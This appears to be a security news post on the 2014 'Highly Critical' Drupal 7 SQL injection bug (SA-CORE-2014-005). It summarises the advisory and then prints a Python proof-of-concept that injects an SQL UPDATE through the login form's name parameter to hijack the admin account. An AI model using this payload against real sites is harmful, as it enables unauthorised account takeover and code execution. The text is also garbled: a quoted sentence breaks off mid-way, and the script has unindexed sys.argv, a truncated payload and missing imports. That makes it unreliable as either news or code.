New Drupal SQL Injection has been discovered and reported to the Drupal security team who have stated that versions of Drupal 7 prior to 7.32 are vulnerable to a “Highly Critical” SQL injection bug. Version 7.32 is now available to address the bug and the Drupal team strongly recommends that Drupal 7 admins update their sites immediately. Drupal is a popular content management system that is free and open source.
An attacker could exploit this vulnerability to achieve privilege escalation or execute arbitrary PHP code. Other unspecified attacks are said to be possible. At the time the vulnerability was disclosed no know exploits were being used. The attack can be launched by an anonymous user, meaning that no social engineering or other work is necessary to allow for it.
Robert Horton, European managing director of security consulting at NCC Group, said that the Drupal flaw is of particular concern because it’s
Despite its severity the Drupal bug was overlooked for months, Horton added.
Here is a POC of the vulnerability below:
#Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
#Creditz to https://www.reddit.com/user/fyukyuk
from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
host = sys.argv
user = sys.argv
password = sys.argv
if len(sys.argv) != 3:
print "host username password"
print "http://nope.io admin wowsecure"
hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
target = '%s/?q=node&destination=node' % host
post_data = "name[0%20;update+users+set+name%3d'"
content = urllib2.urlopen(url=target, data=post_data).read()
if "mb_strlen() expects parameter 1" in content:
print "Success!nLogin now with user:%s and pass:%s" % (user, password)